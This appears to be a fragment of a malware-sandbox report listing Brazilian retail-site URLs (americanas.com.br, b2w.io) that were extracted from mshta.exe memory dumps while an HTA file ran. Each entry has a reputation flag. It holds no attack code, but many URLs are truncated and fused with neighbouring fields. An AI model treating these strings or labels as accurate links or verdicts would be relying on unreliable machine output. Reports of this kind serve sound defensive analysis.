                                                                                                                https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menumshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.americanas.com.br/especial/afiliados?chave=dk_hm_ft_00_02_afiliadosmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2752639169.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743361404.00000000092D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003426000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770941763.00000000092DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667502431.000000000C106000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670707153.00000000092B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.americanas.com.br/hotsite/destaque-telefonia?chave=dk_hm_dt_2_4_telefoniamshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                      high
                                                                                                                      https://www.americanas.com.br/busca/ar-condicionado-split-9000-btusmshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772341116.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670251868.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2534072196.0000000006591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627081042.000000000975A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668835006.0000000009409000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2725760974.0000000009762000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2627122723.000000000975B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                        high
                                                                                                                        https://www.americanas.com.br/categoria/suplementos-e-vitaminas?chave=pfm_home_suplementos_menumshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658292979.0000000003378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747968255.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2765719416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                          high
                                                                                                                          https://ri.americanas.iortmmshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.pngpv1mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667375083.0000000009304000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-imagmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713650880.00000000065AC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695470306.00000000065AA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2544825799.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2659343990.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705796688.00000000065AB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654867106.00000000065A3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2546345644.000000000651E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771021484.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2543401774.0000000006527000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744380912.000000000336C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2542970365.0000000006524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717171158.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.000000000929B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngymshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.0000000009401000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669377685.0000000009401000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-thememshta.exe, 00000000.00000003.2729684267.0000000009802000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644140830.00000000097FD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644462525.00000000097FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655218340.000000000AC2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649211244.000000000AC29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676224284.000000000AC2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644429883.00000000097FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644493386.0000000009801000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749765650.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775320113.000000000AC2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://www.americanasmarketplace.com.br/?epar=bo_tx_st_am_gw_footer_americanas&amp;utm_source=amerimshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                      unknown
                                                                                                                                      https://wishlist-v1-americanas.b2w.io674e18cfc5d819f6a95bb6bf-fe1c66ac0fc461a7e617b6b7eb47e55814ca-9mshta.exe, 00000000.00000003.2694992877.0000000009B21000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2708562764.0000000009B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://www.americanas.com.br/busca/gorro-papai-noelimshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_climameta.largemshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.americanas.com.br/especial/oferta-do-dia?chave=dk_hm_ats_2_9_oddJmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-footmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764767166.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749765650.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769702156.0000000006EF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776074552.000000000C0BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalinahttps://images-amermshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&ammshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                    high
                                                                                                                                                    https://www.americanas.com.br/categoria/enfeites-de-natal?chave=pfm_home_natal_menumshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                      high
                                                                                                                                                      https://www.americanas.com.br/hotsite/banner-cameba?chave=dk_hm_bn_5_4_camebamshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714183267.0000000009A53000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresasmshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713852346.000000000960B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772341116.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670251868.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668835006.0000000009409000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://www.americanas.com.br/categoria/moveis?chave=pfm_hm_tt_1_0_moveisAgmshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menumshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
